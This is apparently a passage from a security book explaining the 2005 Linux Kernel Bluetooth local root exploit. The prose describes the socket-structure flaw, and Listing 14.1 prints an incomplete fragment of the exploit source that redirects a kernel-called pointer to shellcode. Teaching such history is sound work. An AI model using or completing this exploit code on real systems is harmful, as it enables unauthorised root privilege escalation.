Kernel Bluetooth Local Root Exploit for Linux

A small Bluetooth chip uses rather complicated communications protocols, support of which requires lots of time and effort. Practically no team of developers has prevented the appearance of new holes, through which even an elephant could easily slip, to speak nothing about a worm. Linux was no exception. In April 2005, a message about the hole was published, and soon after there appeared the Kernel Bluetooth Local Root exploit, operating on kernels including 2.6.4-52 and 2.6.11.

The developers' error was that they placed the Bluetooth socket structures in the user memory area, thus allowing the hacker full access to modify all fields. One such field was the pointer to the code called from the kernel level. Under normal conditions, it points to the Bluetooth support library. However, nothing could be easier than redirecting it to the shellcode.

The key fragment of this exploit providing root privileges from the user mode is in Listing 14.1. This listing provides a copy of the source code of this exploit downloaded from http://www. securiteam .com/exploits/5KPOFOAFFO.html .

Listing 14.1: Key fragment of the Kernel Bluetooth Local Root exploit

 if ((tmp = klogctl(0x3, buf, 1700)) > -1) {        check = strstr(buf, "ecx: ");        printf(" - [%0.14s]\n", check);        if (*(check+5) == 0x30 && *(check+6) == 0x38)        {           check += 5;           printf(" - suitable value found!using Ox%0.9s\n", check);           printf(" - the time has come to push the button... check your id!\n");           *(check+9) = 0x00; *(--check)  = 'x';  *(--check)  = '0';           mod  =  (unsigned int*)strtoul(check,  0,  0);           for (sock = 0; sock <= 200; sock++)                    *(mod++) = (int)ong_code; // Link to shellcode           if ((sock = socket(AF_BLUETOOTH,  SOCK_RAW,  arg))  < 0)           {                    printf(" - something went wrong (invalid value) \n");                    exit(1);   { {